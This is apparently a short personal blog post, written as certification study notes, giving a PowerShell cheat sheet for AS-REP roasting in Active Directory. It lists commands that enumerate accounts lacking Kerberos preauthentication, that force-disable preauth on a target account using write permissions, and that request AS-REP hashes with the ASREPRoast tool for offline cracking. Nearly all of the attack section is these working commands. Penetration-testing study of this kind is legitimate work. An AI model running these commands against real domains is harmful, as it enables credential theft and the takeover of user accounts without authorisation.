Josh Nutt

Josh Nutt

IT professional with 5+ years of experience, mostly building automation with PowerShell.

Currently studying Infrastructure as Code, Cyber Security, and Azure. Also working on CRTO and CRTP certifications.

When Im not studying Im probably hiking or playing Age of Empires 2.

AS-REP Roast: PowerShell

less than 1 minute read

If a user’s UserAccountControl settings have Do Not Require Kerberos preauthentication enabled it is possible to grab user’s crackable AS-REP and brute-force it offline.

With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well.

Enumeration

# Using PowerView (dev) 
Get-DomainUser -PreauthNotRequired -Verbose  

# Using ActiveDirectory module:  
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

# Enumerate the permissions for RDPUsers on ACLs using PowerView(dev):
Invoke-ACLScanner -ResolveGUIDs |
?{$_.IdentityReferenceName -match "RDPUsers"}

Forcing Kerberos pre-auth

Set-DomainObject -Identity TargetUser5 -XOR @{useraccountcontrol=4194304} –Verbose

Request encrypted AS-REP for offline brute-force

https://github.com/HarmJ0y/ASREPRoast

# Using ASREPROAST 
Get-ASREPHash -UserName VPN1user -Verbose  

# To enumerate all users with Kerberos preauth disabled and request a hash  
Invoke-ASREPRoast -Verbose

You may also enjoy

Encountering Kerberos Encryption Types

1 minute read

While working on the CRTO course I ran into a hash that I couldn’t crack with Hashcat. Instead returning an error indicating the hash is invalid.